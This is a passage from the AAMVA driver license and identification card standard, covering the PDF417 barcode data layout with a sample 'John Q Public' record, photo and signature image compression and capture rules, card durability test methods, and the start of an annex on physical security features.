+Driver Permit Restriction Code 29 PAE
+Driver Permit Endorsement Code 30 PAF
+Driver Last Name 31 DAB
+Driver First Name 32 DAC
+Driver Middle Name or Initial 33 DAD
+Driver Name Suffix 34 DAE
+Driver Name Prefix 35 DAF
+Driver Mailing Street Address 2 36 DAH
+Driver Residence Street Address 1 37 DAL
+Driver Residence Street Address 2 38 DAM
+Driver Residence City 39 DAN
+Driver Residence Jurisdiction Code 40 DAO
+Driver Residence Postal Code 41 DAP
+Height (CM) 42 DAV
+Weight (KG) 43 DAX
+Issue Timestamp 44 DBE
+Number of Duplicates 45 DBF
+Medical Indicator/Codes 46 DBG
+Organ Donor 47 DBH
+Non-Resident Indicator 48 DBI
+Unique Customer Identifier 49 DBJ
+Driver "AKA" Date Of Birth 50 DBL
+Driver "AKA" Social Security Number 51 DBM
+Driver "AKA" Name 52 DBN
+Driver "AKA" Last Name 53 DBO
+Driver "AKA" First Name 54 DBP
+Driver "AKA" Middle Name 55 DBQ
+Driver "AKA" Suffix 56 DBR
+Driver "AKA" Prefix 57 DBS
+E.4.5 Example of 2D Symbol
+Following is an example of a 2D symbol printed in accordance with this standard and containing the following
+information:
+Drivers License Number: 0123456789ABC
+Driver License Name: John Q Public
+Driver Street Address: 123 Main Street
+Driver Mailing City: Anytown
+Driver Mailing Jurisdiction Code: VA
+Driver Mailing Postal Code: 123459999
+Driver Class Code(s): DM
+DL Restriction Codes: (none)
+62
+
+Driver License Endorsements: (none)
+Height: 509
+Weight: 175
+Eye Color: BL
+Hair Color: BR
+DL Expiration Date: 20011201
+Date of Birth: 19761123
+Driver Sex: M
+Driver License Document Issue Date: 19961201
+Jurisdiction Defined Code: JURISDICTIONDEFINEDELEMENT
+when decoded would result in a data stream as follows (Note: b = Blank):
+@L R C ANSIb 6360000102DL00390187ZV02260031DLDAQ0123456789ABCL
+F S R F
+DAAPUBLIC,JOHN,QL DAG123b MAINb STREETL DAIANYTOWNL DAJVAL DAK123459999bb L
+F F F F F
+DARDMbb L DASbbbbbbbbbb L DATbbbbb L DAU509L DAW175L DAYBLb L DAZBRb L DBA20011201L
+F F F F F F F F
+DBB19761123L DBCML DBD19961201C ZVZVAJURISDICTIONDEFINEDELEMENTC
+F F R R
+This data, when broken down further, can be better understood as:
+HEADER,
+@ the first character in any compliant 2D symbol
+L the character to represent a Data Element Separator
+F
+R the character to represent a Record Separator
+S
+C the character used represent a Segment Terminator
+R
+ANSIb which indicates that the symbol meets the AAMVA National Standard, and a blank space
+636000 which indicates the jurisdiction (Virginia) that printed the symbol
+01 which indicates that the rest of the data follows version 1 of the AAMVA National Standard
+02 which indicates the number of Subfile Designators and indicates (in this example) that two follow
+SUBFILE DESIGNATOR,
+DL and ZV indicates the subfile types
+DL (Drivers License)
+0039 which indicates the offset from the beginning of the symbol to the start of the related subfile
+0187 which indicates the length of the subfile type
+ZV (Jurisdiction Defined)
+63
+
+0226 which indicates the offset from the beginning of the symbol to the start of the related Subfile
+0031 which indicates the length of the Subfile type
+SUBFILE DATA,
+DLwhich is the Subfile Identifier
+DAQ0123456789ABCL which is the Field Identifier (FI) for our example, which would mean a Drivers License Number
+F
+follows, and a 13 position Drivers License Number, and Data Element Separator (DES)
+DAAPUBLIC,JOHN,QL which is the FI for Name, the Name with required separators, and DES
+F
+DAG123b MAINb STREETL which is the FI for Street Address, the Street Address, and DES
+F
+DAIANYTOWNL which is the FI for City, and the City, and DES
+F
+DAJVAL which is the FI for Jurisdiction Code, and the Jurisdiction Code, and DES
+F
+DAK123459999bb L which is the FI for Postal Code, the Postal Code padded to an 11 digit fixed length, and DES
+F
+DARDMbb L which is the FI for Class Code, the Class Code padded to 4 digit fixed length, and DES
+F
+DASbbbbbbbbbb L which is the FI for the ANSI D-20 Restriction Codes, and the Restriction Codes padded to 10 digit
+F
+fixed length, and the DES
+DATbbbbb L which is the FI for the ANSI D-20 License Endorsements, and the Endorsements padded to 5 digit fixed
+F
+length, and the DES
+DAU509L which is the FI for Height, and the Height (ft/in), and DES
+F
+DAW175L which is the FI for Weight, the weight in lbs, and DES
+F
+DAYBLb L which is the FI for Eye Color, the ANSI D-20 Eye Color, and DES
+F
+DAZBRb L which is the FI for Hair Color, the ANSI D-20 Hair Color, and DES
+F
+DBA20011201L which is the FI for Expiration Date, the Expiration Date (YYYYMMDD), and DES
+F
+DBB19761123L which is the FI for Birthdate, the Birthdate (YYYYMMDD), and DES
+F
+DBCML which is the FI for Sex, the ANSI D-20 Sex Code, and DES
+F
+DBD19961201which is the FI for Document Issues Date, the Date (YYYYMMDD)
+C which is a Segment Terminator
+R
+ZVwhich is the Subfile Identifier
+ZVA JURISDICTIONDEFINEDELEMENT which is the FI for a Jurisdiction Defined Data Element, and the data
+C which is a Segment Terminator.
+R
+64
+
+E.5 Error Detection and Correction
+PDF417 symbols shall use a minimum Error Correction Level of 3. Where space allows, an Error Correction Level of 5
+is recommended.
+E.6 Character Sets
+The AAMVA community shall use the 256 character table known as ASCII/ISO 8859-1 as the character set table when
+generating Hi-Density symbols and for efficiency shall use the 128 character subset TEXT COMPACTION TABLE as
+defined in the specification.
+E.7 Compression
+No specific recommendation is presented at this time. The AAMVA community has no need to employ specific
+Compression techniques beyond the field truncation constructs incorporated into the overall Data Structure option
+recommended in this standard.
+65
+
+66
+
+Annex F
+(normative)
+Driver license/identification card compression for digital imaging
+Introduction
+This annex contains the required elements to use JPEG and Greyscale compression for Storage and Transmission of
+images between jurisdictions.
+F.1 Conformance
+A License or Identification Card photo and signature image that incorporates Storage and Transmission of said images
+shall comply with the following: ISO 10918-1 and ITU-T Group III and IV.
+F.2 Definitions
+F.2.1
+binary
+Binary refers to black and white images. The data bit is either on or off.
+F.2.2
+CCITT
+CCITT is the current standard for binary image compression. Primarily used in fax transmissions, CCITT Groups III
+and IV were defined by the International Consultative Committee on Telegraph and Telephone. CCITT was
+reorganized in 1993 and is now known as ITU-T.
+F.2.3
+color
+a continuous tone image that has more than one component
+F.2.4
+Continuous Tone Image
+an image whose components have more than one bit per sample
+F.2.5
+Gray Scale
+a continuous tone image that has only one component
+F.2.6
+JPEG
+JPEG is the proposed compression standard for continuous tone images. It was published in 1993 as ISO 10918-1
+and ITU-T T.81. It was produced by the Joint Photographic Experts Group.
+67
+
+F.2.7
+pixel
+a pixel is a picture element - one of an n by m matrix of picture elements, where n is across (horizontal) and m is down
+(vertical)
+F.2.8
+Still Image (Digital)
+a set of two-dimensional arrays of data
+F.2.9
+TIFF (Tagged Image File Format)
+industry accepted practice for storing image information
+F.2.10
+(Adaptive) (Binary) Arithmetic Encoder
+an entropy encoding procedure, which codes by means of a recursive subdivision of the probability of the sequence of
+symbols coded up to that point
+F.2.11
+(Uniform) Quantization
+the procedure by which discrete cosine transform (DCT) coefficients are linearly scaled in order to achieve
+compression
+F.2.12
+8x8 Block
+an 8x8 array of samples
+F.2.13
+Component
+one of the two-dimensional arrays which comprise an image
+F.2.14
+Compressed Image Data
+a coded representation of an image
+F.2.15
+compression
+reduction in the number of bits used to represent source image data
+F.2.16
+Controlled Quality (Lossy)
+A descriptive term for encoding and decoding processes which are not lossless. Controlled quality compression allows
+for varying compression ratios at various quality levels.
+F.2.17
+decoding process
+a process, which takes as its input, compressed image data and outputs a continuous tone image
+F.2.18
+encoding process
+a process, which takes as its input a continuous tone image and outputs compressed image data
+F.2.19
+entropy decoder
+a lossless procedure which recovers the sequence of symbols from the sequence of bits produced by the entropy
+encoder
+68
+
+F.2.20
+entropy encoder
+a lossless procedure which translates a sequence of input symbols into a sequence of bits such that the average
+number of bits per symbol approaches the entropy of the input symbols
+F.2.21
+hierarchical
+A method of encoding an image in which the first frame for a given component is followed by frames which code the
+differences between the source data and the reconstructed data from the previous frame for that component.
+Resolution changes are allowed between frames.
+F.2.22
+Huffman Encoder
+an entropy encoding procedure which assigns a variable length code to each input symbol
+F.2.23
+Huffman Table
+the set of variable length codes required in a Huffman encoder and Huffman decoder
+F.2.24
+Interchange Format
+the representation of compressed image data for exchange between application environments
+F.2.25
+interleaved
+the descriptive term applied to the repetitive multiplexing of small groups of data units from each component in a scan
+in a specific order
+F.2.26
+JFIF (JPEG File Interchange Format)
+JFIF is a minimal file format, which enables JPEG bit streams to be exchanged between a wide variety of platforms
+and applications
+F.2.27
+lossless
+a descriptive term for encoding and decoding procedures in which it is guaranteed that no information is lost from input
+to output
+F.2.28
+non-interleaved
+the descriptive term applied to the data unit processing sequence when the scan has only one component
+F.2.29
+Progressive (Coding)
+one of the DCT-based or hierarchical processes defined in the JPEG standard in which each scan typically improves
+the quality of the reconstructed image
+F.2.30
+quantization tables
+the set of 64 scalar quantization values used to the DCT coefficients
+F.2.31
+Run (Length)
+number of consecutive symbols of the same value
+69
+
+F.2.32
+Sample
+one element in the two-dimensional array which comprises a component
+F.2.33
+scan
+a single pass through the data for one or more of the components in an image
+F.2.34
+Sequential (Coding)
+one of the lossless or DCT-based coding processes defined in the JPEG standard in which each component of the
+image is encoded within a single scan
+F.3 Information Contents and Formats
+F.3.1 Requirements for Photographs and Signatures
+F.3.1.1 Color Photo Images
+Table F.3 defines the recommended requirement for color photo images by shading in the options recommended for
+licensing/identification applications.
+F.3.1.1.1 Image Data Formats
+The image header can define the image size, the number of bits per pixel, the scan start and scan order. This allows
+any application to process the images appropriately. For color photo images, 16 bits per pixel or 24 bits per pixel are
+required. Typically, 16 bit acquisition devices are less expensive than 24 bit and give good quality results. If the
+compression is 16 bit Y,Cb,Cr, then the input of 16 bit 5R,6G,5B or 5R,5G,5B or 6R,6G,4B or 24 bit RGB doesn't
+matter.
+F.3.1.1.2 Image Compression Standard
+For color photo images, the JPEG baseline defined to be controlled quality, 8 bit per component, sequential DCT with
+Huffman coding is required.
+F.3.1.1.3 Associated JPEG Parameters
+F.3.1.1.3.1 Interchange Format
+Tables F.1 and F.2 specify the recommended file interchange format. This file interchange format is in the spirit of
+JFIF and adds application specific information.
+Table F.1 — Recommended File Interchange Format
+Field Length Comments
+(in bytes)
+SOP 2 Start of Packet
+Non JPEG 2 Indicates start of non-JPEG data
+Length 2 Application data segment length
+* Version 3 JPEG version
+Units 1 Units for the X and Y densities:
+units =0: no units, X & Y specific aspect ratio
+units =1: X & Y are dots per inch
+units =2: X & Y are dots per centimeter
+70
+
+Field Length Comments
+(in bytes)
+X density 2 Horizontal pixel density
+Y density 2 Vertical pixel density
+X size 2 Horizontal size based on units
+(in/cm)
+Y size 2 Vertical size based on units (in/cm)
+* Color Space 1 O=Y , Cb, Cr
+Scan Order 1 Orientation of Image:
+0 = 0 degrees, 1 = 90, 2 = 180, 3 = 270
+(degrees in navigational terms)
+Annotation 1-255 NULL terminated string could include name license
+number, etc.
+X’FF’, SOI 2 Start of Image (JPEG)
+** X’FF’, DQT 2+N *65 Nq = number of quantization tables
+Length (see Table F.2
+Quantization Comments)
+Table Parameters
+** X’FF’, DHT 2+N*(17+m) Nh = Number of Huffman tables
+Length Huffman Table (see Table F.2 m=S of number of codes of lengths 1 - 16
+Parameters Comments)
+X’FF’, SOFO 8+3*N Nf = Number of image components in a frame
+Length Frame (see Table F.2
+Parameters Comments)
+X’FF’, SOS 6+2*N Ns = Number of image components in a scan
+Length Scan (see Table F.2
+Parameters Comments)
+(entropy coded scan
+data)
+X’FF’, EOI 2 End of image
+EOP 2 End of Packet
+Table F.2 — Recommended file interchange format
+Comments:
+¾ All the AAMVA specific information and tables shall be “sent” once in an abbreviated stream to
+minimize overhead cost.
+¾ Type of compression, number of lines, and number of samples per line are included in the frame
+header.
+¾ Nq = Nh = 2 for color Nq = Nh = 1 for gray scale
+Nf = Ns = 3 for color Nf = Ns = 1 for gray scale
+For Color:
+¾ 1st component C1 = 1= Y component
+¾ 2nd component C2 = 2 = Cb component
+¾ 3rd component C3 = 3 = Cr component
+* Information is included for flexibility in the event of future changes
+** Allows for a JPEG abbreviated table stream: X’FF’, SOI, X’FF’, DQT, table(s), DHT, table(s), X’FF’,
+EOI where the tables are sent once before the first image and not with subsequent images.
+71
+
+F.3.1.1.3.2 Color Space Translation
+TIFF and JFIF (JPEG File Interchange Format) suggest the CCIR recommendation 601-1 and the associated
+translation to Y,Cb,Cr as shown below:
+Y = 0.299R + 0.587G + 0.114B
+Cb = 128 - 0.1687R - 0.3313G + 0.5B
+Cr = 128 + 0.5R - 0.4187G - 0.0813B
+If the numbers exceed 255, they shall be clamped at 255. Similarly, if they under flow, they shall be clamped at zero
+(0).
+Table F.3 — Required for color images
+CATEGORY DECISION POINTS
+Image Data · Size
+Formats · Scan Start
+· Scan Order
+· Pixel Format
+Bits Per Pixel 16 or 24 8, 10, 12, 32
+Standard JPEG Baseline JPEG Extension
+· Controlled Quality · Lossless;
+· 8 Bit per Component; · Progressive DCT;
+· Sequential DCT; · Arithmetic Coding; &
+· Huffman Coding; and · Greater than 8 bits
+· Restart Codes
+Conversion Scheme Left Justify
+Color Space R,G,B to Y, Cb, Cr Other
+Translation Color Space Options
+· RGB
+CMYK
+HIS
+Others
+Interleaved Yes No
+Subsampling ratio 2 Horizontal & 2 Vertical Any Combination of
+2 Horizontal
+No Subsampling · 1, 2, 3, or 4
+Horizontal &
+· 1, 2, 3, or 4 Vertical
+Huffman Tables Send Once Send with Each Data
+Stream
+Send Once Send with Each Data
+Quantization tables Stream
+F.3.1.1.4 Options to Optimize Performance
+F.3.1.1.4.1 Sub sampling
+It is required that the CrCb band subsampling be one of the following two options.
+NOTE The intensity band Y is never subsampled.
+72
+
+¾ Every other sample in the horizontal and the vertical directions.
+¾ Every other sample in the horizontal direction only, no subsampling in the vertical direction.
+F.3.1.1.4.2 Interleaving
+It is required that the data be interleaved and compressed as Y, then Cb, then Cr.
+F.3.1.1.4.3 Table Signaling
+It is required that both the Huffman Tables and Quantization Tables be sent one time.
+F.3.1.2 Signatures
+Tables F.4 and F.5 define the specifications for signatures by shading in the required elements for licensing /
+identification applications.
+F.3.1.2.1 Image Data Formats
+The image header can define the image size, the number of bits per pixel, the scan start and scan order. This allows
+any application to process the images appropriately. For signature images, 8 bits per pixel gray scale or binary images
+are required.
+F.3.1.2.2 Image Compression Methods
+¾ For Gray Scale signatures use the shaded portions of Table F.4.
+¾ For binary signatures use the shaded portions of Table F.5.
+73
+
+Table F.4 — Requirements for signatures gray scale
+CATEGORY DECISION POINTS
+Image Type Gray Scale Binary
+Bits per Pixel 8 · 4 1
+· 10
+· 12
+Standards * JPEG Baseline JPEG Extension CCITT CCITT
+· Controlled Quality; · Lossless; Group Group
+· 8 Bit per Component; · Progressive DCT; III IV
+· Sequential DCT; and · Arithmetic Coding; and
+· Huffman Coding · Greater than 8 bits
+Conversion Left Justify Not Applicable
+Scheme
+Quantization Send Once Send with each Data Not Applicable
+Tables Stream
+Huffman Tables Send Once Send with each Data Not Applicable
+Stream
+Image Data · Size
+Formats · Scan Start
+· Scan Order
+· Pixel Format
+Dimensionality Not Applicable 1 2 2
+Only
+Table F.5 — Requirements for Signatures Binary
+CATEGORY DECISION POINTS
+Image Type Gray Scale Binary
+Bits per Pixel 8 · 4 1
+· 10
+· 12
+Standards * JPEG Baseline JPEG Extension CCITT CCITT
+· Controlled Quality; · Lossless; Group Group
+· 8 Bit per Component; · Progressive DCT; III IV
+· Sequential DCT; and · Arithmetic Coding; and
+· Huffman Coding · Greater than 8 bits
+Conversion Left Justify Not Applicable
+Scheme
+Quantization Send Once Send with each Data Not Applicable
+Tables Stream
+Huffman Tables Send Once Send with each Data Not Applicable
+Stream
+Image Data · Size
+Formats · Scan Start
+· Scan Order
+· Pixel Format
+Dimensionality Not Applicable 1 2 2
+Only
+74
+
+F .3.1.3 Associated JPEG Parameters
+F.3.1.3.1 Interchange Format
+The recommended file interchange can be found in Table F.2. This interchange file format is intended to give the
+receiver of image transmission a method of converting the images from one Pre-JPEG or JPEG image format to
+another for viewing or printing.
+F.3.1.4 Options to Optimize Performance
+F.3.1.4.1 Table Signaling
+It is required that both the Huffman Tables and Quantization Tables be sent one time.
+F.4 Signature Compressed Vector Format
+Signatures collected from digital signature tablets where the data takes the form of a list of x, y coordinates, the
+compressed vector format may be used to losslessly store and transmit this data. The Signature Compressed Vector
+Data format shall consist of a file header followed by a variable length field containing the vector data. The top left
+coordinate of a signature shall be taken as the origin (0, 0). The x coordinate shall be defined as the horizontal
+coordinate increasing to the right. The y coordinate shall be defined as the vertical coordinate increasing in the
+downward direction.
+origin (0 , 0) x
+y
+Figure F.1 Signature format
+75
+
+F.4.1 File Header Format
+The file header shall consist of the identifying 3 byte tag “SIG” (hexadecimal values 53, 49, 47) followed by the x and y
+resolution of the tablet and the number of points in the vector data portion.
+F.4.1.1 Horizontal Resolution
+The horizontal resolution of the signature shall be recorded in 2 bytes as an integer number representing pixels per
+inch.
+F.4.1.2 Vertical Resolution
+The vertical resolution of the signature shall be recorded in 2 bytes as an integer number representing pixels per inch.
+F.4.1.3 Number of Vectors
+The number of vectors contained in the vector data shall be recorded as an integer number in 2 bytes.
+F.4.2 Vector Data Format
+The list of x, y coordinates shall be processed in the order recorded during the signature. All coordinates shall be
+represented as a vector from the previously recorded point (X – previous X, Y – previous Y). The first vector of a
+signature shall be considered to be taken from the top left coordinate (0, 0). Each vector shall be recorded with the
+offset in x first, then the offset in y. Each offset shall be recorded either as a small offset or a large offset. Both offsets
+in a vector need not be recorded using the same offset format. Each vector shall indicate a pen movement of nonzero
+distance. It is not allowed to represent no movement of the pen using a vector of (0, 0), because this is reserved to
+indicated the lifting of the pen.
+F.4.2.1 Small Offset
+A small offset shall be any difference greater than or equal to –63 and less than or equal to 63. A small offset shall be
+recorded in one byte, where the most significant bit set 0 and the next significant bit is the sign bit followed by 6 bits of
+magnitude. The sign bit shall be set to 1 if the offset is negative, 0 otherwise.
+F.4.2.2 Large Offset
+A large offset shall be any difference less than –63 or greater than 63. A larger offset shall be recorded in two bytes,
+where the most significant bit set 1 and the next significant bit is the sign bit, followed by 14 bits of magnitude. The
+sign bit shall be set to 1 if the offset is negative, 0 otherwise.
+76
+
+F.4.2.3 Pen Lift
+Signature Compress Vector Data Stream
+File Header
+dx & dy offset pairs
+one-byte offset
+( -63 to 63)
+T - offset type: 0 = one-byte, 1 = two-byte
+T S M M M M M M
+S - sign bit: 0 = non-negative, 1 = negative
+M - magnitude bits
+two-byte offset
+(-16383 to 16383)
+T S MM M M M M MM M M M M M M
+Figure F.2 Signature data stream
+The lifting of the pen shall be represented as a vector of (0, 0) in the vector data. The vector following an pen lift vector
+(0, 0) shall indicate the jump to the next pen down of the signature from the point just before the pen lift vector. The
+pen lift offset shall be counted as a vector for the number of vectors parameter in the file header. There is no
+requirement to end the signature with a pen lift offset.
+F.5 Digital Images
+Digital Images shall be placed in, but not limited to, four categories:
+¾ Category A: Digital Facial Portrait Images
+¾ Category B: Digital Signature Images
+¾ Category C: Digital Finger Images (See Finger Imaging Annex C)
+¾ Category D: Ghosted Images
+F.5.1 Category A - Facial Portrait Image (Capture)
+F.5.1.1 Pose
+The full-face or frontal pose is the most commonly used pose in driver licenses.
+F.5.1.2 Depth of Field
+The subject's captured facial image shall always be in focus from the nose to the ears.
+77
+
+F.5.1.3 Centering
+The facial image being captured (full-face pose) shall be positioned to satisfy all of the following conditions:
+a) The approximate horizontal midpoints of the mouth and of the bridge of the nose shall lie on an imaginary vertical
+straight line positioned at the horizontal center of the image. See line AA in Figure 3.
+b) An imaginary horizontal line through the center of the subject's eyes shall be located at approximately the 55%
+point of the vertical distance up from the bottom edge of the captured image. See line BB in Figure 3.
+c) The width of the subject's head shall occupy approximately 50% of the width of the total image width. This width
+shall be the horizontal distance between the midpoints of two imaginary vertical lines. Each imaginary line shall be
+drawn between the upper and lower lobes of each ear and shall be positioned where the external ear connects to
+the head. See line CC in Figure 3.
+Figure F.3 Centering facial image
+F.5.1.4 Lighting
+Adequate lighting shall be used to fully illuminate the subject during capture. Appropriate techniques shall also be
+employed and light(s) positioned to minimize shadows and hot spots on the facial image.
+F.5.1.5 Background
+The subject whose image is being captured for the purposes of issuing a general drivers license document shall be
+positioned in front of a blue background.
+It is desired that utilization of a single color backdrop will allow for easier exchange and usage of previously captured
+images between jurisdictions.
+NOTE Currently 48 US and 8 Canadian jurisdictions utilize a blue color background for general driver licenses.
+F.5.1.6Aspect Ratio
+The Width:Height aspect ratio of the facial portrait image shall be in accordance with the universal camera standard of
+1:1.333 for portrait images.
+Cropping of the original captured image prior to compression and storage is permissible provided that the cropping
+technique maintains the specified aspect ratio of 1:1.333 and the minimum and maximum pixel width:height
+requirement and the image is stored with the defined aspect ratio above.
+78
+
+Applications outside of Driver Licensing utilizing the images for reproduction, display, etc. shall adhere to the defined
+aspect ratio.
+F.5.1.7 Color Space
+Captured electronic color facial images shall adhere to the Color Space Translation requirements in F.3.1.1.3.2.
+Additional color management techniques are available from the International Color Consortium. Information regarding
+these techniques can be downloaded from the following URL: http://www.color.org
+F.5.1.8 Compression Algorithm
+The algorithm used to compress facial portrait images shall conform to the JPEG Sequential Baseline mode of
+operation as described in Table F.3.
+NOTE Applications which utilize the compressed JPEG facial portrait image may have to perform an analysis of the
+information contained within the graphic file for external purposes. (i.e., Facial Recognition Matching Algorithm) A significant loss
+of data resulting from image compression may interfere with these processes. The compression and lossy values utilized should
+accommodate such external uses as may be necessary.
+F.5.1.9 File Format
+Please refer to the Transmission section F.3 of this Annex.
+F.5.2 Category A - Facial Portrait Image (Document)
+F.5.2.1 Aspect Ratio
+The width:height aspect ratio of the printed facial portrait image shall be 1:1.333, in accordance with the capture
+aspect ratio in Section F.5.1.6.
+F.5.2.2 Facial Portrait Image Dimensions
+The minimum width:height of a facial portrait image printed on a driver license document shall be 25.4 millimeters
+(1.000 inches) in the horizontal direction by 33.9 millimeters (1.333 inches) in the vertical direction.
+F.5.2.3 Borders
+Colored borders or frames surrounding the facial portrait image are optional and may present useful purposes in
+distinguishing various driver license types. These borders shall adhere to the following rules:
+a) Borders shall not overlap nor interfere with the human-readable functionality of the facial portrait image.
+b) Borders shall not obstruct the data contained within the image nor reduce or alter the image aspect ratio of
+1.1.333.
+c) Borders shall not form part of the original captured, stored or compressed facial portrait image, but shall be
+applied through utilization of preprinting or another method during the production of the finished document.
+F.5.3 Category B - Signature Images (Capture)
+F.5.3.1 Digitization
+Any method of converting a handwritten signature into a digital format for the purpose of inclusion on a driver license
+document must meet the following criteria:
+79
+
+Manual or automatic resizing or cropping of the captured image shall not alter the width:height aspect ratio of the
+original signature.
+a) A target aspect ratio of 4:1 width:height shall be utilized.
+b) Cropping of the signature shall maintain the target 4:1 width/height aspect ratio.
+c) The minimum (100 pixels per inch) resolution requirements shall be met.
+F.5.3.2 Compression and Storage
+Refer to section F.3 of this annex.
+F.5.3.3 File Format
+Refer to section F.3 of the annex.
+F.5.4 Category B - Signature Images (Document)
+F.5.4.1 Aspect Ratio
+The target width:height aspect ratio of the printed signature image shall be 4:1, in accordance with the capture aspect
+ratio in Section F.5.3.1 above.
+F.5.4.2 Signature Image Dimensions
+The minimum width:height of a printed signature image on a driver license document shall be 25.4 millimeters (1.000
+inches) in the horizontal direction by 6.35 millimeters (0.25 inches) in the vertical direction.
+F.5.4.3 Borders
+Colored borders or frames surrounding the signature image are optional and may present useful purposes in
+distinguishing various driver license types. These borders shall adhere to the following rules:
+a) Borders shall not overlap nor interfere with the human-readable functionality of the signature image.
+b) Borders shall not obstruct the data contained within the image nor reduce or alter the signature image aspect ratio
+of 4:1.
+c) Borders shall not form part of the original captured, stored or compressed signature image, but shall be applied
+through utilization of preprinting or another method during the production of the finished document.
+F.5.5 Category C - Finger Images (Capture)
+F.5.5.1 Standards
+The electronic capture and storage of finger image data is relatively new to the digital imaging industry and as such
+there remains a lack of internationally recognized standards for the capture, quality, minutiae extraction, storage,
+security, and exchange of resulting data. However, the following standards have been established and form a basis for
+the capture and storage of electronic finger image data, and provide the image formats necessary to perform future
+applications that may be required:
+¾ ANSI/NIST-CSL 1-1993 Data Format for the Interchange of Fingerprint Information, ANSI, November 22, 1993.
+80
+
+¾ WSQ Gray-Scale Fingerprint Image Compression Specification, IAFIS-IC-0110V2, Criminal Justice Information
+Services (CJIS), Federal Bureau of Investigation, February 16, 1993.
+Refer to annex C of this document for finger imaging standards.
+F.5.6 Category C - Finger Images (Document)
+Please refer to the applicable machine readable Annex sections of this document in regard to storing finger image data
+on a document.
+F.5.7 Category D - Ghosted Images (Capture)
+Ghosted images refer to the increased reduction in data of an existing facial portrait image that has been decreased in
+intensity, contrast and often overall dimensions.
+Ghosted images used in a driver license document are utilized as an added form of security. For this purpose the
+“ghosted” image shall refer to a duplication of the Facial Portrait Image manipulated during the card personalization
+process and shall utilize those specifications in subclause F.5.1. in regard to capture and storage.
+The ghosted image is not generally a separate image for the purposes of storage but most commonly a mechanical or
+electrical manipulation of the existing primary facial portrait image.
+F.5.8 Category D - Ghosted Images (Document)
+No standards exist for the utilization of ghosted images; however, the following guidelines shall be applied when
+ghosted images are applied to a driver license document:
+a) The ghosted image utilized in a driver license document shall utilize the exact same Facial Portrait Image that
+appears on the same document.
+b) The ghosted image shall be easily recognizable by human-readable means as a replication of the Facial Portrait
+Image contained elsewhere on the same document.
+c) The ghosted image shall not interfere with the ability to recognize and decipher any human-readable or machine-
+readable data contained elsewhere on the document.
+d) The ghosted image shall maintain the aspect ratio specified in subclause F.5.1, consistent with the facial portrait
+image.
+81
+
+82
+
+Annex G
+(normative)
+Test Methods
+Introduction (informative)
+Driver license jurisdictions need some level of assurance about card service life. Therefore, jurisdictions are requiring
+card durability test results when requests for proposal (RFP) are made. The RFPs often include inadequately defined
+test methods that leave test details up to the test laboratory’s discretion. The result is that test data will often be
+significantly affected by the discretionary details.
+The ANSI NCITS 322 test methods were developed by industry experts from card component suppliers, card
+manufacturers, and card personalization companies. The objective was to provide standardized tests capable of giving
+reproducible results.
+These accelerated laboratory test methods are the group’s best effort to simulate field failures. Relevancy and
+correlation between predicted card service life and ANSI NCITS 322 test data has not been established at the time of
+publication. Test results only provide a means of ranking or comparing one card structure to another. Future work is
+planned to determine relevancy of and correlation between card test methods and card service life.
+G.1 Scope
+This annex provides a set of precisely defined card durability test procedures based on ANSI NCITS 322. The
+usefulness of results obtained from these test methods is only to compare or rank the relative durability of one card
+structure to another.
+G.2 Conformance
+A test result is in conformance with this annex if it meets all the mandatory requirements specified directly or by
+reference herein. Test results shall not be represented as equivalent to card service life.
+G.3 Normative references
+The following normative documents contain provisions which, through reference in this text, constitute provisions of
+this annex. For dated references, subsequent amendments to, or revisions of, any of these publications do not apply.
+For undated references, the latest edition of the normative document referred to applies.
+ANSI NCITS 322, For information technology-Card durability test methods: 1998
+ISO 10373-1, Identification cards - Test methods - General characteristics tests
+83
+
+G.4 Terms and definitions
+For the purposes of this annex, the following terms and definitions apply:
+G.4.1 card service life
+period of time between card issuance and expiration date
+G.5 Test methods and sample size
+Only the test methods described in ANSI NCITS 322 shall be used. Performing multiple tests on the same card shall
+not be done. Sample size is not specified, however some tests require more than 1 card in order to obtain a single
+result.
+Note (Informative) Test precision is unknown for the individual test methods. Therefore, caution should be taken
+when determining if the test result differences between card types is large enough to be statistically significant. It is
+strongly recommended that one laboratory perform comparison testing for all card types being evaluated. If possible,
+cards from different vendors should also be tested simultaneously to minimize test variability. Sample sizes necessary
+to reach statistical confidence are unknown. Typical sample sizes used by industry are shown in the tables below.
+ANSI NCITS 322 recommended sample size (Informative)
+Clause Test description Card orientation Typical
+sample
+size
+NA = not applicable # cards
+5.1 Delamination-90 degrees NA 6
+5.2 Delamination-180 degrees NA 6
+5.3 Delamination-Heat Transfer Film Layers NA 6
+5.4 ID-1 Card Flexure axis A, face up 4
+axis A, face down 4
+axis B, face up 4
+axis B, face down 4
+5.5 ID-1 Card Static Stress axis A, face up 25
+axis A, face down 25
+axis B, face up 25
+axis B, face down 25
+84
+
+5.6 ID-1 Card Stress and Plasticizer Exposure axis A, face up 4
+axis A, face down 4
+axis B, face up 4
+axis B, face down 4
+5.7 Impact Resistance NA 25
+5.8 Card Structural Integrity NA 15
+5.9 Surface Abrasion NA 6
+5.10 Bar Code Abrasion NA 6
+5.11 Mag Stripe Abrasion NA 6
+5.12 Image Abrasion NA 6
+5.13 Temperature and Humidity Induces Dye Migration NA 6
+5.14 Plasticizer Induced Dye Migration NA 6 sets of 5
+5.15 Ultraviolet (UV) Light Exposure Stability test both sides of card 6
+5.16 Daylight Image Stability-Xenon Arc test both sides of card 6
+5.17 Laundry Test NA 6
+5.18 Embossed Character Retention-Pressure NA 6
+5.19 Embossed Character Retention-Heat NA 6
+ISO 10373-1 recommended sample size (Informative)
+Test description Card orientation Typical
+sample
+size
+clause NA = not applicable # cards
+5.9 DDyynnaammiicc ttoorrssiioonnaall ssttrreessss ((ttoorrssiioonn)) NA 6
+85
+
+G.6 Test report
+For each test performed, the following information shall be included in the test report:
+- ANSI NCITS 322 or ISO 10373-1 date and clause number
+- test method title
+- sample size used
+- date when testing was completed
+- identifying name or number to describe the type/color/style of card tested
+- result for each card tested (numeric and/or qualitative)
+86
+
+Annex H
+(informative)
+Physical security features for the driver license/identification card
+Introduction
+This annex represents a sample of possible physical security features that may be used in the construction of a DL/ID.
+This is NOT an all inclusive list and is for informational purposes only.
+H.1 Features
+(C = Covert, O = Overt, 1 = First Line Inspection, 2 = Second Line Inspection, 3 = Third Line Inspection)
+(O1) Core Inclusion - It is possible to manufacture a plastic document with several different layers of core stock. A
+colored core material can be added to the card construction to create a colored edge along the card. This technique is
+currently used in the new INS Work Permit Card as a means of identifying a genuine document.
+(C2/3) Deliberate Errors or Known Flaws - A feature or attribute known only to the manufacturer or inspection
+officials.
+(O2) Directional Metamerism - Directional metamerism refers to the use of colors that differ in spectral composition
+but match one another under certain lighting conditions. Using this technique, designs can be created that will show
